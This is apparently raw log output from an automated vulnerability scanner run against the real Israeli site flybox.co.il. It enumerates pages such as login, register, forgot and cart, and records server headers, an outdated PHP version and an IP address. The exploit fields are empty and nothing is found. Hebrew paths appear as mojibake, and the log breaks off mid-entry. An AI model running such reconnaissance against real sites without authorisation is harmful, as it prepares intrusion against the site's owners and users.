[1;37m|_[ + ] [[1;37m 10 / 100 [1;37m][0;37m-[05:18:41][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/instructors/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 11 / 100 [1;37m][0;37m-[05:18:42][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/personal_details/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 12 / 100 [1;37m][0;37m-[05:18:43][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/terms/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 13 / 100 [1;37m][0;37m-[05:18:44][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/restaurant/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 14 / 100 [1;37m][0;37m-[05:18:45][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/kids/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 15 / 100 [1;37m][0;37m-[05:18:45][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/×€××××××§×¡-××ª×§×©××š×ª/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 16 / 100 [1;37m][0;37m-[05:18:46][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/social-events/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 17 / 100 [1;37m][0;37m-[05:18:47][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/personal_details/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 18 / 100 [1;37m][0;37m-[05:18:48][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/parties-events/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 19 / 100 [1;37m][0;37m-[05:18:49][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/××_××××_××¢××£/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 20 / 100 [1;37m][0;37m-[05:18:51][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/events/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 21 / 100 [1;37m][0;37m-[05:18:52][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/××××/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 22 / 100 [1;37m][0;37m-[05:18:54][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/faq/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 23 / 100 [1;37m][0;37m-[05:18:55][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/××§×Š××¢× ××/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 24 / 100 [1;37m][0;37m-[05:18:57][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/instructors/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 25 / 100 [1;37m][0;37m-[05:18:57][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/gift-packages/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 26 / 100 [1;37m][0;37m-[05:18:58][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/parties-events/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 27 / 100 [1;37m][0;37m-[05:18:59][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/×©×××š××/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 28 / 100 [1;37m][0;37m-[05:18:59][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/cart/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 29 / 100 [1;37m][0;37m-[05:19:00][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/logbook/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 30 / 100 [1;37m][0;37m-[05:19:01][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/personal_details_coupon/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 31 / 100 [1;37m][0;37m-[05:19:01][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/register/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 32 / 100 [1;37m][0;37m-[05:19:02][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/×ª×¢××€×-××ª×§×××ª-×××š××¢××/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 33 / 100 [1;37m][0;37m-[05:19:02][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/login/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 34 / 100 [1;37m][0;37m-[05:19:03][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/×€××××××§×¡-××ª×§×©××š×ª/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 35 / 100 [1;37m][0;37m-[05:19:03][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/blog/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 36 / 100 [1;37m][0;37m-[05:19:04][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/forgot/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 37 / 100 [1;37m][0;37m-[05:19:04][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/health/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 38 / 100 [1;37m][0;37m-[05:19:04][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/×š××Š××-××¢××£-×©××/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 39 / 100 [1;37m][0;37m-[05:19:06][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/gift-packages/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 40 / 100 [1;37m][0;37m-[05:19:06][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/contact/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 41 / 100 [1;37m][0;37m-[05:19:07][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/unsubsribe/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 42 / 100 [1;37m][0;37m-[05:19:08][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/social-events/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 43 / 100 [1;37m][0;37m-[05:19:08][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/packages/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 44 / 100 [1;37m][0;37m-[05:19:09][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/upsells/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 45 / 100 [1;37m][0;37m-[05:19:10][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/×ª×¢××€×-××ª×§×××ª-×××š××¢××/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 46 / 100 [1;37m][0;37m-[05:19:10][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/××-×××-×× ××š×ª-×š××/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 47 / 100 [1;37m][0;37m-[05:19:11][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/blog/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
